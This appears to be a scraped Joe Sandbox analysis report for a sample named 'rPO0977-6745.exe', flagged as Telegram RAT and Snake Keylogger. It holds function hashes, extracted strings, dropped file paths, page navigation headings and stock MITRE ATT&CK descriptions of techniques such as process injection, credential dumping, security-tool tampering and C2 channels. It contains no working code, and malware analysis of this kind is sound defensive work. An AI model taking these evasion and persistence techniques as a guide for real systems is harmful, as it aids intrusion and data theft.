Instruction ID: 4bf70237ad45723ee8c2dc95a1a875cfd97a704c09edf58ac6e9bda779fc73c2
Opcode Fuzzy Hash: f2f31da5c28e73c506eca0c00e5b6afca06bea95f9a2bdde005ef4f2c112c005
Instruction Fuzzy Hash: E1C08C608042028ACF319F5099F4A0D3A20FB81302F2200E7C8018A0A6E1200284DA41

Non-executed Functions

Function 064E2858 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

", xrefs: 064E302F
PHq, xrefs: 064E2E7A
LjEp, xrefs: 064E2D0F
PHq, xrefs: 064E2BA6
LjEp, xrefs: 064E2E07
LjEp, xrefs: 064E2CF9
LjEp, xrefs: 064E2C04
PHq, xrefs: 064E2C8A
LjEp, xrefs: 064E2B22
PHq, xrefs: 064E2D93
LjEp, xrefs: 064E2B0C
PHq, xrefs: 064E2D7F
PHq, xrefs: 064E2E8E
0oEp, xrefs: 064E29A8
LjEp, xrefs: 064E2DF1
PHq, xrefs: 064E2B92
LjEp, xrefs: 064E2C1A
PHq, xrefs: 064E2C9E

Memory Dump Source

Source File: 00000017.00000002.3701679878.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_64e0000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID: "$0oEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
API String ID: 0-3075396612
Opcode ID: df08683557e14dd06cb9aa102265a075869c8cb592ae3a9873abffd003ab0f7a
Instruction ID: c8101d7cdc32672fa42c18b7777aa82dd40727773779d7e3c8f5a80b6f51e8df
Opcode Fuzzy Hash: df08683557e14dd06cb9aa102265a075869c8cb592ae3a9873abffd003ab0f7a
Instruction Fuzzy Hash: 18329074E00218CFEB64DF65D984B9DBBB2BF89301F1081AAD809AB365DB755E85CF10

Function 064E2848 Relevance: 12.9, Strings: 10, Instructions: 365COMMON

Download Yara Rule

Strings

", xrefs: 064E302F
PHq, xrefs: 064E2E8E
PHq, xrefs: 064E2D7F
0oEp, xrefs: 064E29A8
PHq, xrefs: 064E2E7A
PHq, xrefs: 064E2BA6
PHq, xrefs: 064E2B92
PHq, xrefs: 064E2C9E
PHq, xrefs: 064E2C8A
PHq, xrefs: 064E2D93

Memory Dump Source

Source File: 00000017.00000002.3701679878.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_64e0000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID: "$0oEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
API String ID: 0-659101215
Opcode ID: 3a993cff25873e2be0abb4774dbcff3ab351632247d24d4d456ac202d7483465
Instruction ID: 8ac972bd3ef10a26402fbfda4f58a377ec43e3e160e434ecd18b7a237e82bab8
Opcode Fuzzy Hash: 3a993cff25873e2be0abb4774dbcff3ab351632247d24d4d456ac202d7483465
Instruction Fuzzy Hash: 7202A074E002188FDB64DF65D984B9DBBF2BF89300F1081A9D819AB365DB755E85CF10

Function 00E46088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 00E4609E
\;q, xrefs: 00E460C6
\;q, xrefs: 00E46094
\;q, xrefs: 00E460BA

Memory Dump Source

Source File: 00000017.00000002.3692676756.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e40000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 5a8b6611be52971af0fcb71245bd7b79fee733490a160d8dc94765f4137bd3f6
Instruction ID: ee55ee72e8fd6449faef13183ab677838aaaa237d7bbf4e8deadc20d407c04e8
Opcode Fuzzy Hash: 5a8b6611be52971af0fcb71245bd7b79fee733490a160d8dc94765f4137bd3f6
Instruction Fuzzy Hash: 9901A7317001258FCB348E2DE444A6673E6BFDA7A8729527AE502DB3B4DA71DC428752

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rPO0977-6745.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EDyxAgkldisLe.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPO0977-6745.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ley3isf.vh3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jiszu5j.bcl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c0grjqc.amp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddap2fxj.pnj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrnefvhn.udn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4zpmwxp.xmh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_um2plh5i.fqs.psm1

Windows Analysis Report
rPO0977-6745.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre